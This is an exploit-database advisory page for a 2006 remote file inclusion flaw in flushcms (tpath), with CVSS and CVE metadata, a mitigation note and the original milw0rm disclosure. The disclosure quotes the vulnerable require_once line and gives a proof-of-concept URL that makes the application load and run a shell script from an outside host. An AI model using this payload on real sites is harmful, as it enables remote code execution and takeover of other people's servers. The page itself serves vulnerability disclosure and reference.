header-logo
Suggest Exploit
vendor:
flushcms
by:
igi
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: flushcms
Affected Version From: flushcms (tpath) 1.0
Affected Version To: flushcms (tpath) 1.0
Patch Exists: YES
Related CWE: CVE-2006-3730
CPE: a:tpath:flushcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2006

flushcms (tpath) Remote File Inclusion Vulnerability

flushcms (tpath) is prone to a remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application.

Mitigation:

Upgrade to the latest version of flushcms (tpath)
Source

Exploit-DB raw data:

flushcms  (tpath) Remote File Inclusion Vulnerability

virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact  :  anti_hacker_online@yah00.com
for all member  virangar

bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------

simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?

# milw0rm.com [2006-07-16]

Navigation

Suggest Exploit

Services By CQR